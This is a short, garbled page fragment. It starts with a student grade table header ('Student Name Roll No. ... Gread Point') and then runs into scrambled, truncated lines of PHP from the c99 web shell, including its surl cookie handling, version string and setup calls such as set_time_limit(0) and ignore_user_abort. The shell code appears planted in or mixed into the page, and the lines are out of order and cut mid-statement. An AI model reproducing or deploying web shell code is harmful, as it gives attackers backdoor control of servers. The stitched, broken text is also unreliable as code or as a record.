Student Name Roll No. Reg. No Course Name Gread Point
if (empty($surl))
if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&" "https://" "ssl://" "ftp://"
$surl_autofill_include = true; //If true then search variables with descriptors (URLs) and save it i
}
else {$surl = $_REQUEST["c99sh_surl"]; //Set this cookie for manual SURL
elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl"
if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = "";}
//CONFIGURATION AND SETTINGS
$shver = "1.0 beta (21.05.2005)"; //Current version
foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}
$_REQUEST = array_merge($_COOKIE
if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr
define("starttime"
if (!@ob_get_contents()) {@ob_start(); @ob_implicit_flush(0);}
$win = strtolower(substr(PHP_OS
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@ignore_user_abort(true);
error_reporting(5);
if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec